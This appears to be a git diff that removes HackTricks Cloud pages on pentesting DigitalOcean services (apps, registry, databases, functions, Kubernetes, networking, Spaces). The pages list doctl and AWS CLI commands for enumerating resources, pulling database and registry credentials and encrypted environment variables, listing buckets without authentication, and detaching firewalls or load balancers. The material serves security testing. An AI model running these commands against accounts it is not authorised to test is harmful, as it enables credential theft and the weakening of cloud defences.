-{% endhint %} - -DO doesn't support granular permissions. So the **minimum role** that allows a user to review all the resources is **member**. A pentester with this permission will be able to perform harmful activities, but it's what it's. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/digital-ocean-pentesting/do-services/README.md b/pentesting-cloud/digital-ocean-pentesting/do-services/README.md deleted file mode 100644 index 5df4185ea..000000000 --- a/pentesting-cloud/digital-ocean-pentesting/do-services/README.md +++ /dev/null @@ -1,45 +0,0 @@ -# DO - Services - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -DO offers a few services, here you can find how to **enumerate them:** - -* [**Apps**](do-apps.md) -* [**Container Registry**](do-container-registry.md) -* [**Databases**](do-databases.md) -* [**Droplets**](do-droplets.md) -* [**Functions**](do-functions.md) -* [**Images**](do-images.md) -* [**Kubernetes (DOKS)**](do-kubernetes-doks.md) -* [**Networking**](do-networking.md) -* [**Projects**](do-projects.md) -* [**Spaces**](do-spaces.md) -* [**Volumes**](do-volumes.md) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/digital-ocean-pentesting/do-services/do-apps.md b/pentesting-cloud/digital-ocean-pentesting/do-services/do-apps.md deleted file mode 100644 index f10dcde2f..000000000 --- a/pentesting-cloud/digital-ocean-pentesting/do-services/do-apps.md +++ /dev/null @@ -1,61 +0,0 @@ -# DO - Apps - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -[From the docs:](https://docs.digitalocean.com/glossary/app-platform/) App Platform is a Platform-as-a-Service (PaaS) offering that allows developers to **publish code directly to DigitalOcean** servers without worrying about the underlying infrastructure. - -You can run code directly from **github**, **gitlab**, **docker hub**, **DO container registry** (or a sample app). - -When defining an **env var** you can set it as **encrypted**. The only way to **retreive** its value is executing **commands** inside the host runnig the app. - -An **App URL** looks like this [https://dolphin-app-2tofz.ondigitalocean.app](https://dolphin-app-2tofz.ondigitalocean.app) - -### Enumeration - -```bash -doctl apps list # You should get URLs here -doctl apps spec get # Get yaml (including env vars, might be encrypted) -doctl apps logs # Get HTTP logs -doctl apps list-alerts # Get alerts -doctl apps list-regions # Get available regions and the default one -``` - -{% hint style="danger" %} -**Apps doesn't have metadata endpoint** -{% endhint %} - -### RCE & Encrypted env vars - -To execute code directly in the container executing the App you will need **access to the console** and go to **`https://cloud.digitalocean.com/apps//console/`**. - -That will give you a **shell**, and just executing **`env`** you will be able to see **all the env vars** (including the ones defined as **encrypted**). - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/digital-ocean-pentesting/do-services/do-container-registry.md b/pentesting-cloud/digital-ocean-pentesting/do-services/do-container-registry.md deleted file mode 100644 index 72897f1e7..000000000 --- a/pentesting-cloud/digital-ocean-pentesting/do-services/do-container-registry.md +++ /dev/null @@ -1,59 +0,0 @@ -# DO - Container Registry - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -DigitalOcean Container Registry is a service provided by DigitalOcean that **allows you to store and manage Docker images**. It is a **private** registry, which means that the images that you store in it are only accessible to you and users that you grant access to. This allows you to securely store and manage your Docker images, and use them to deploy containers on DigitalOcean or any other environment that supports Docker. - -When creating a Container Registry it's possible to **create a secret with pull images access (read) over it in all the namespaces** of Kubernetes clusters. - -### Connection - -```bash -# Using doctl -doctl registry login - -# Using docker (You need an API token, use it as username and as password) -docker login registry.digitalocean.com -Username: -Password: -``` - -### Enumeration - -```bash -# Get creds to access the registry from the API -doctl registry docker-config - -# List -doctl registry repository list-v2 -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/digital-ocean-pentesting/do-services/do-databases.md b/pentesting-cloud/digital-ocean-pentesting/do-services/do-databases.md deleted file mode 100644 index d31d67c7b..000000000 --- a/pentesting-cloud/digital-ocean-pentesting/do-services/do-databases.md +++ /dev/null @@ -1,71 +0,0 @@ -# DO - Databases - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -With DigitalOcean Databases, you can easily **create and manage databases in the cloud** without having to worry about the underlying infrastructure. The service offers a variety of database options, including **MySQL**, **PostgreSQL**, **MongoDB**, and **Redis**, and provides tools for administering and monitoring your databases. DigitalOcean Databases is designed to be highly scalable, reliable, and secure, making it an ideal choice for powering modern applications and websites. - -### Connections details - -When creating a database you can select to configure it **accessible from a public network**, or just from inside a **VPC**. Moreover, it request you to **whitelist IPs that can access it** (your IPv4 can be one). - -The **host**, **port**, **dbname**, **username**, and **password** are shown in the **console**. You can even download the AD certificate to connect securely. - -{% code overflow="wrap" %} -```bash -sql -h db-postgresql-ams3-90864-do-user-2700959-0.b.db.ondigitalocean.com -U doadmin -d defaultdb -p 25060 -``` -{% endcode %} - -### Enumeration - -```bash -# Databse clusters -doctl databases list - -# Auth -doctl databases get # This shows the URL with CREDENTIALS to access -doctl databases connection # Another way to egt credentials -doctl databases user list # Get all usernames and passwords - -# Dbs inside a database cluster -doctl databases db list - -# Firewall (allowed IPs), you can also add -doctl databases firewalls list - -# Backups -doctl databases backups # List backups of DB - -# Pools -doctl databases pool list # List pools of DB -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/digital-ocean-pentesting/do-services/do-functions.md b/pentesting-cloud/digital-ocean-pentesting/do-services/do-functions.md deleted file mode 100644 index ad37aa951..000000000 --- a/pentesting-cloud/digital-ocean-pentesting/do-services/do-functions.md +++ /dev/null @@ -1,88 +0,0 @@ -# DO - Functions - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -DigitalOcean Functions, also known as "DO Functions," is a serverless computing platform that lets you **run code without having to worry about the underlying infrastructure**. With DO Functions, you can write and deploy your code as "functions" that can be **triggered** via **API**, **HTTP requests** (if enabled) or **cron**. These functions are executed in a fully managed environment, so you **don't need to worry** about scaling, security, or maintenance. - -In DO, to create a function first you need to **create a namespace** which will be **grouping functions**.\ -Inside the namespace you can then create a function. - -### Triggers - -The way **to trigger a function via REST API** (always enabled, it's the method the cli uses) is by triggering a request with an **authentication token** like: - -```bash -curl -X POST "https://faas-lon1-129376a7.doserverless.co/api/v1/namespaces/fn-c100c012-65bf-4040-1230-2183764b7c23/actions/functionname?blocking=true&result=true" \ - -H "Content-Type: application/json" \ - -H "Authorization: Basic MGU0NTczZGQtNjNiYS00MjZlLWI2YjctODk0N2MyYTA2NGQ4OkhwVEllQ2t4djNZN2x6YjJiRmFGc1FERXBySVlWa1lEbUxtRE1aRTludXA1UUNlU2VpV0ZGNjNqWnVhYVdrTFg=" -``` - -To see how is the **`doctl`** cli tool getting this token (so you can replicate it), the **following command shows the complete network trace:** - -```bash -doctl serverless connect --trace -``` - -**When HTTP trigger is enabled**, a web function can be invoked through these **HTTP methods GET, POST, PUT, PATCH, DELETE, HEAD and OPTIONS**. - -{% hint style="danger" %} -In DO functions, **environment variables cannot be encrypted** (at the time of this writing).\ -I couldn't find any way to read them from the CLI but from the console it's straight forward. -{% endhint %} - -**Functions URLs** look like this: `https://.doserverless.co/api/v1/web//default/` - -### Enumeration - -```bash -# Namespace -doctl serverless namespaces list - -# Functions (need to connect to a namespace) -doctl serverless connect -doctl serverless functions list -doctl serverless functions invoke -doctl serverless functions get - -# Logs of executions -doctl serverless activations list -doctl serverless activations get # Get all the info about execution -doctl serverless activations logs # get only the logs of execution -doctl serverless activations result # get only the response result of execution - -# I couldn't find any way to get the env variables form the CLI -``` - -{% hint style="danger" %} -There **isn't metadata endpoint** from the Functions sandbox. -{% endhint %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/digital-ocean-pentesting/do-services/do-images.md b/pentesting-cloud/digital-ocean-pentesting/do-services/do-images.md deleted file mode 100644 index eaba5349d..000000000 --- a/pentesting-cloud/digital-ocean-pentesting/do-services/do-images.md +++ /dev/null @@ -1,45 +0,0 @@ -# DO - Images - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -DigitalOcean Images are **pre-built operating system or application images** that can be used to create new Droplets (virtual machines) on DigitalOcean. They are similar to virtual machine templates, and they allow you to **quickly and easily create new Droplets with the operating system** and applications that you need. - -DigitalOcean provides a wide range of Images, including popular operating systems such as Ubuntu, CentOS, and FreeBSD, as well as pre-configured application Images such as LAMP, MEAN, and LEMP stacks. You can also create your own custom Images, or use Images from the community. - -When you create a new Droplet on DigitalOcean, you can choose an Image to use as the basis for the Droplet. This will automatically install the operating system and any pre-installed applications on the new Droplet, so you can start using it right away. Images can also be used to create snapshots and backups of your Droplets, so you can easily create new Droplets from the same configuration in the future. - -### Enumeration - -``` -doctl compute image list -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.md b/pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.md deleted file mode 100644 index d91a05f1d..000000000 --- a/pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.md +++ /dev/null @@ -1,65 +0,0 @@ -# DO - Kubernetes (DOKS) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -### DigitalOcean Kubernetes (DOKS) - -DOKS is a managed Kubernetes service offered by DigitalOcean. The service is designed to **deploy and manage Kubernetes clusters on DigitalOcean's platform**. The key aspects of DOKS include: - -1. **Ease of Management**: The requirement to set up and maintain the underlying infrastructure is eliminated, simplifying the management of Kubernetes clusters. -2. **User-Friendly Interface**: It provides an intuitive interface that facilitates the creation and administration of clusters. -3. **Integration with DigitalOcean Services**: It seamlessly integrates with other services provided by DigitalOcean, such as Load Balancers and Block Storage. -4. **Automatic Updates and Upgrades**: The service includes the automatic updating and upgrading of clusters to ensure they are up-to-date. - -### Connection - -```bash -# Generate kubeconfig from doctl -doctl kubernetes cluster kubeconfig save - -# Use a kubeconfig file that you can download from the console -kubectl --kubeconfig=//k8s-1-25-4-do-0-ams3-1670939911166-kubeconfig.yaml get nodes -``` - -### Enumeration - -```bash -# Get clusters -doctl kubernetes cluster list - -# Get node pool of cluster (number of nodes) -doctl kubernetes cluster node-pool list - -# Get DO resources used by the cluster -doctl kubernetes cluster list-associated-resources -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.md b/pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.md deleted file mode 100644 index 29cf44eb1..000000000 --- a/pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.md +++ /dev/null @@ -1,72 +0,0 @@ -# DO - Networking - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -### Domains - -```bash -doctl compute domain list -doctl compute domain records list -# You can also create records -``` - -### Reserverd IPs - -```bash -doctl compute reserved-ip list -doctl compute reserved-ip-action unassign -``` - -### Load Balancers - -```bash -doctl compute load-balancer list -doctl compute load-balancer remove-droplets --droplet-ids 12,33 -doctl compute load-balancer add-forwarding-rules --forwarding-rules entry_protocol:tcp,entry_port:3306,... -``` - -### VPC - -``` -doctl vpcs list -``` - -### Firewall - -{% hint style="danger" %} -By default **droplets are created WITHOUT A FIREWALL** (not like in oder clouds such as AWS or GCP). So if you want DO to protect the ports of the droplet (VM), you need to **create it and attach it**. -{% endhint %} - -```bash -doctl compute firewall list -doctl compute firewall list-by-droplet -doctl compute firewall remove-droplets --droplet-ids -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/digital-ocean-pentesting/do-services/do-projects.md b/pentesting-cloud/digital-ocean-pentesting/do-services/do-projects.md deleted file mode 100644 index bc82b2449..000000000 --- a/pentesting-cloud/digital-ocean-pentesting/do-services/do-projects.md +++ /dev/null @@ -1,49 +0,0 @@ -# DO - Projects - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -> project is just a container for all the **services** (droplets, spaces, databases, kubernetes...) **running together inside of it**.\ -> For more info check: - -{% content-ref url="../do-basic-information.md" %} -[do-basic-information.md](../do-basic-information.md) -{% endcontent-ref %} - -### Enumeration - -It's possible to **enumerate all the projects a user have access to** and all the resources that are running inside a project very easily: - -```bash -doctl projects list # Get projects -doctl projects resources list # Get all the resources of a project -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/digital-ocean-pentesting/do-services/do-spaces.md b/pentesting-cloud/digital-ocean-pentesting/do-services/do-spaces.md deleted file mode 100644 index a19a48b8f..000000000 --- a/pentesting-cloud/digital-ocean-pentesting/do-services/do-spaces.md +++ /dev/null @@ -1,72 +0,0 @@ -# DO - Spaces - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -DigitalOcean Spaces are **object storage services**. They allow users to **store and serve large amounts of data**, such as images and other files, in a scalable and cost-effective way. Spaces can be accessed via the DigitalOcean control panel, or using the DigitalOcean API, and are integrated with other DigitalOcean services such as Droplets (virtual private servers) and Load Balancers. - -### Access - -Spaces can be **public** (anyone can access them from the Internet) or **private** (only authorised users). To access the files from a private space outside of the Control Panel, we need to generate an **access key** and **secret**. These are a pair of random tokens that serve as a **username** and **password** to grant access to your Space. - -A **URL of a space** looks like this: **`https://uniqbucketname.fra1.digitaloceanspaces.com/`**\ -Note the **region** as **subdomain**. - -Even if the **space** is **public**, **files** **inside** of it can be **private** (you will be able to access them only with credentials). - -However, **even** if the file is **private**, from the console it's possible to share a file with a link such as `https://fra1.digitaloceanspaces.com/uniqbucketname/filename?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=DO00PL3RA373GBV4TRF7%2F20221213%2Ffra1%2Fs3%2Faws4_request&X-Amz-Date=20221213T121017Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Signature=6a183dbc42453a8d30d7cd2068b66aeb9ebc066123629d44a8108115def975bc` for a period of time: - -
- -### Enumeration - -```bash -# Unauthenticated -## Note how the region is specified in the endpoint -aws s3 ls --endpoint=https://fra1.digitaloceanspaces.com --no-sign-request s3://uniqbucketname - -# Authenticated -## Configure spaces keys as AWS credentials -aws configure -AWS Access Key ID [None]: -AWS Secret Access Key [None]: -Default region name [None]: -Default output format [None]: - -## List all buckets in a region -aws s3 ls --endpoint=https://fra1.digitaloceanspaces.com - -## List files inside a bucket -aws s3 ls --endpoint=https://fra1.digitaloceanspaces.com s3://uniqbucketname - -## It's also possible to generate authorized access to buckets from the API -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
